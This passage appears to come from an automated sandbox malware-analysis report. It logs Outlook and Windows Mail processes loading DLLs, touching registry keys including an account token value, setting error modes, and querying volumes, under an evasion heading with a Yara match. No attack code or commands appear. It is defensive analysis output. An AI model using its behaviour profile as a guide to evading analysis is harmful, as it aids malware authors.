              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: microsoft.applications.telemetry.windows.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso20imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vccorlib140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_1_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_1_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso30imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mso20imm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_1_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msvcp140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vcruntime140_app.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.xaml.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coremessaging.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47langs.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: iertutil.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dcomp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: twinapi.appcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wintypes.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositorycore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windowmanagementapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textinputframework.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: inputhost.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coreuicomponents.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: propsys.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: coreuicomponents.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: ntmarta.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecoreuapcommonproxystub.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uxtheme.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: urlmon.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: srvcli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: netutils.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxgi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: resourcepolicyclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: office.ui.xaml.hxaccounts.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d11.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.applicationdata.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d3d10warp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dxcore.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxcomm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptsp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: d2d1.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dwrite.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.applicationmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.globalization.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: bcp47mrm.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: textshaping.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: onecorecommonproxystub.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.connectivity.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.networking.hostname.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.energy.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rmclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.storage.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wldp.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: rometadata.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.system.diagnostics.telemetry.platformtelemetryclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxcommmodel.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: mrmcorer.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositoryclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.shell.servicehostbuilder.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: execmodelproxy.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: uiamanager.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.core.textinput.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.immersive.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dataexchange.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: cryptbase.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.accountscontrol.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: xmllite.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.security.authentication.web.core.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: userenv.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: profext.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: directmanipulation.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: winrttracing.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: vaultcli.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.staterepositoryps.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: microsoftaccountwamextension.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.web.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: dpapi.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: hxoutlook.resources.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: msftedit.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: globinputhost.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windows.ui.xaml.controls.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: windowscodecs.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeSection loaded: execmodelclient.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: wuceffects.dll
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeSection loaded: threadpoolwinrt.dll
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Classes\Wow6432Node\CLSID\{F959DBBB-3867-41F2-8E5F-3B8BEFAA81B3}\InprocServer32
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEWindow found: window name: SysTabControl32
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeFile opened: C:\Windows\SYSTEM32\msftedit.dll
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\Common
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEKey value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935} DeviceTicket
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxAccounts.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 1.3.d.script.csv, type: HTML
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEFile Volume queried: C:\Windows\SysWOW64 FullSizeInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\OUTLOOK.EXEProcess information queried: ProcessInformation
              Source: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exeQueries volume information: C:\Program Files (x86)\Microsoft Office\root\Office16\AI\WordCombinedFloatieLreOnline.onnx VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeui.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Windows\Fonts\segoeuil.ttf VolumeInformation
              Source: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\HxOutlook.exeQueries volume information: C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_16005.14326.21580.0_x64__8wekyb3d8bbwe\images\offsym.ttf VolumeInformation
